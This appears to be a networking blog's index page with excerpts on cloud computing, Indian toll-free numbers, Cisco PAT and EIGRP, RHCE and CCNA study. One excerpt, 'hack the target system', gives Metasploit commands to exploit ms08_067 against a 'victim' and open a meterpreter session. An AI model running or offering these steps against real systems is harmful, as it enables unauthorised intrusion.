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cloud computing

As the name implies, where computing resources (applications, servers and other resources) are in the cloud (Amazon, Microsoft, and so on), as shown below:- As we know, setting up companies infrastructure requires time, money and lots of efforts. To simply this, cloud computing provides us pre-built and pre-configured servers very quickly and easily. The cost is dependent upon the usage, but not on the actual cost of servers. There are three types of cloud:- 1. Public Cloud : This service is shared with others and everyone is sharing the same set of infrastructure. Example is, Amazon Web Services, and Google Mail etc. Smaller clients prefer this service, since there is no huge cost involved. 2. Private Cloud : This service is dedicated to only one company. Most of the times, this server is a virtual server accessed by the secured connection, like VPN. This service is recommended for high-confidential data and your company policies strictly restricts for sharing it with o...

Toll free Numbers In India

Airlines Indian Airlines 1800 180 1407 Jet Airways 1800 22 5522 Spice Jet 1800 180 3333 Air India 1800 22 7722 Kingfisher 1800 180 0101 Banks ABN AMRO 1800 11 2224 Axis Bank Ltd. 18604258888 Canara Bank 1800 44 6000 Citibank 1800 44 2265 Corporation Bank 1800 443 555 Development Credit Bank 1800 22 5769 HDFC Bank 1800 227 227 ICICI Bank 1800 333 499 ICICI Bank NRI 1800 22 4848 IDBI Bank 1800 11 6999 Indian Bank 1800 425 1400 ING Vysya 1800 44 9900 Kotak Mahindra Bank 1800 22 6022 Lord Krishna Bank 1800 11 2300 Punjab National Bank 1800 122 222 State Bank of India 1800 44 1955 Syndicate Bank 1800 44 6655 Automobiles Mahindra Scorpio 1800 22 6006 Maruti 1800 111 515 Tata Motors 1800 22 5552 Windshield Experts 1800 11 3636 Computers/IT Adrenalin 1800 444 445 AMD 1800 425 6664 Apple Computers 1800 444 683 Canon 1800 333 366 Cisco Systems 1800 221 777 Compaq HP 1800 444 999 Data One Broadband 1800 424 1800 Dell 1800 444 026 Epson 1800 44 0011 eSys 3970...


Routers Used: 2621 w/ CISCO2600-MB-2FE and WIC-2T modules IOS: c2600-i-mz.121-5.T9 Objective In this lab, Port Address Translation (PAT) and port forwarding are configured. Scenario The International Travel Agency is planning to launch an informational Web site on a local Webserver for the general public. However, the one Class C address that has been allocated will not be sufficient for the users and devices the company has on this network. Therefore, a network is configured that will allow all internal company users access to the Internet and all Internet users access to the company’s informational Web server through static NAT and PAT. Internal user addresses must be translated to one legal global address and all Internet Users must access the informational Web server through the one legal global address as well. Step 1 Build and configure the network according to the diagram. If you are using the configuration files from the previous lab, remove the NAT pool (public) and the stati...

PAT configration

Routers Used: 2621 w/ CISCO2600-MB-2FE and WIC-2T modules IOS: c2600-i-mz.121-5.T9 Objective In this lab, Port Address Translation (PAT) and port forwarding are configured. Scenario The International Travel Agency is planning to launch an informational Web site on a local Webserver for the general public. However, the one Class C address that has been allocated will not be sufficient for the users and devices the company has on this network. Therefore, a network is configured that will allow all internal company users access to the Internet and all Internet users access to the company’s informational Web server through static NAT and PAT. Internal user addresses must be translated to one legal global address and all Internet Users must access the informational Web server through the one legal global address as well. Step 1 Build and configure the network according to the diagram. If you are using the configuration files from the previous lab, remove the NAT pool (public) and the stati...

how to know the ip add of sender

Finding IP Address Of the Sender In Hotmail!! # Log into your Hotmail account with your username and password. # Click on the Mail tab on the top. # Open the mail. # If you do not see the headers above the mail message, your headers are not displayed . To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on Mail Display Settings * In Message Headers, make sure Advanced option is checked. * Click on Ok button * Go back to the mails and open that mail. # If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address * Hotmail headers : Daniel ,In this case the IP address of the sender is []. This is be the IP address of the sender. # If you find a header with Received: from followed by a Gmail proxy like this * Hotmail headers : Daniel * Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [69.140.7...


One of the annoying fileds in my opinion is calculation, I hate them! in my mind it is just in the way of the cool stuff. but unfurtunetly to get to the cool stuf you need to calculate. so I would like to start by giving you a little review and may be more indepth look over EIGRP Metric, as we all should know EIGRP is a Hybrid Routing Protocol that use a Composite Metric in his DUAL Diffusing Update Algorithm. the Composite metric is composed (good word selection :-)!?) from K Values. K1 K2 K3 K4 K5 K1 = Bandwidth = 1 meaning it is used in the calculation by default. K2 = load = 0 you gust it, meaning that is not participating in the calculation by default. K3 = Delay = 1 you can take it from here K4 = Reliability = 0 K5 = MTU = 0 the K values tells us if the value is participating in the calculation or not and what is the weight of the value, meaning that if you set K1 to 3 then it means that the weight of K1 will be 3 times more "important" or in other words it will take th...

hack the target system

Main Part: - We download nmap ( so that we can scan the remote pc. - On the terminal we write: nmap -sS -O - If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be. - Now we download Metasploit ( and we open it via the Terminal. - Now that Metasploit is running we start the attack. - We write at the terminal “show exploits” and we get a list of the avaliable exploits. - We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi” - Now we set RHOST to our victims ip: “set RHOST ” - And RPORT to 445: “set RPORT 445″ - Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again. - OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp” - IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER. - If everything is ok you should see the following message: “[*] Meterpeter session 1 opened ( -> - Meterpet...

rhce notes

This is RHCE notes i wrote while studding for the exam, it doesn’t cover all exam topics, maybe they can help you to review what did you studied no more.. User Administration: - adduser UserName - deluser UserName - usermod: to modifiy user information.. - chage: change expiration date for user account. - always when you use a directory as a share for a group, use SGID, for ex: chmod 2770 /share-dir for login/logout scripts and bash, refer to this topic: bash loging, startup scripts and shell initialization files ACL: mount with acl, ex: mount -o remount, acl /dev/sda5 /home as root: touch /home/idle-boy/a getfacl /home/idle-boy/a getfacl: Removing leading ‘/’ from absolute path names # file: home/idle-boy/a # owner: root # group: root user::rw- group::r– other::r– setfacl -m u:idle-boy:rw -m g:idle-boy:rwx /home/idle-boy/a getfacl: Removing leading ‘/’ from absolute path names # file: home/idle-boy/a # owner: root # group: root user::rw- user:idle-boy:rw- group::r– group:idle-boy...

best ccna exam prepration

CCNA is one of the most respected Associate level Certifications in the world today. Getting a CCNA will definitely help you to get a better job or at least get your foot into the Professional Networking Field. This article will describe the tips we give our students at IPSR to achieve CCNA. 1. Getting ready mentally: First thing you need to do is mentally prepare yourself. That is, you have to seriously think about why why you want to be CCNA certified. You have to firmly decide and believe that you will get CCNA within next 1-2 months or so. Try to budget your study time well. If you a very social person you will have to give up some of your socialising for the next couple of months. Since CCNA includes all the basics of networking you need to spend around 5 hrs per day for a fast track. Keep one thing in mind though; CCNA needs interest and dedication. it covers the most modern communication. 2. Step into the right institute: Find aninstitute with good lab infrastructure, reputatio...

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